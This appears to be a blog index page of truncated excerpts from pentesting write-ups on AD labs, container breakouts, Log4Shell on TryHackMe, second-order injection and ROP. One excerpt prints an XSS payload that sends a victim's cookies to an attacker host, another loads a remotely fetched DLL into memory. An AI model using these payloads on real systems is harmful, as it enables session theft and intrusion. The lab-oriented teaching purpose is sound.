Hi Readers, Here we will be looking into automation of ad deployment. This challenge is part of Auror Project initiative by Zscaler’s Sudarshan Pisupati 🙏 Prerequisites: Packer Vagrant Virtualbox/Vmware Workstation(i have used VirtualBox for demonstration) Curiosity/Laziness The Challenge/Goal: Let’s create two machines, Machine A and Machine B. Machine A (Domain…

Hi reader! I am sure you might have encountered a container while pentesting with read only filesystem and felt stuck as you can’t transfer files/run your custom programs… Today we will be looking into what we can try if ever got into such container. Prerequisites(copied from https://github.com/arget13/DDexec)- These programs should…

Cookie Stealing- (Note: HttpOnly should not be enabled/present in cookie header) Classic way- <script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script> Here we have used btoa() method for converting the cookie string into base64 encoded string. python3 -m http.server -m 80 2. Bypassing secure flag protection- a) Creating a HTTPS server- openssl req -new -x509 -keyout…

Finding and installing AD Module- C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\<Version> It will be present by default only in Domain Controller(Windows Server 2019 in this case) Microsoft.ActiveDirectory.Management.dll Import-Module ([System.Reflection.Assembly]::Load((Invoke-WebRequest -Uri "http://192.0.0.3/Microsoft.ActiveDirectory.Management.dll").content))

Hi readers, here we will be looking into exploitation of CVE-2021–44228. THM- solar https://tryhackme.com/room/solar Start the lab machine and let’s start with Reconnaissance- TASK 2(Reconnaissance) nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out 10.10.171.12 autorecon -vvv 10.10.171.12 Going through the results we found http is running…

Note: If you need to get overview of container internals, please go through previous article(https://pswalia2u.medium.com/container-internals-c03ed692e35c) before reading this. A) Docker unix socket mounted in container/Docker tcp socket exposed(Container Breakout-1)- Some container monitoring and management application requires docker unix socket to be mounted inside container for their functioning(e.g portainer). …

A) Registery and image layers Container registry is just a server which will be hosting images(.tar files along with .json file) to be used by multiple remote users. It is similar to docker hub(Your own private dockerhub!). …

Second order injection is code injection vulnerability in which unfiltered user input is not directly being passed to the query by web application. Sometimes unfiltered user input is first gets stored in database before going to the query. These types of injections cannot be usually detected by automated scanners, as…

Note: this scenerio is in frolic htb machine. ROP(Return-Oriented Programming) exploit- Download the binary into local machine for testing. Run the binary with gdb and pass a parameter. Parameter is getting printed back on the screen.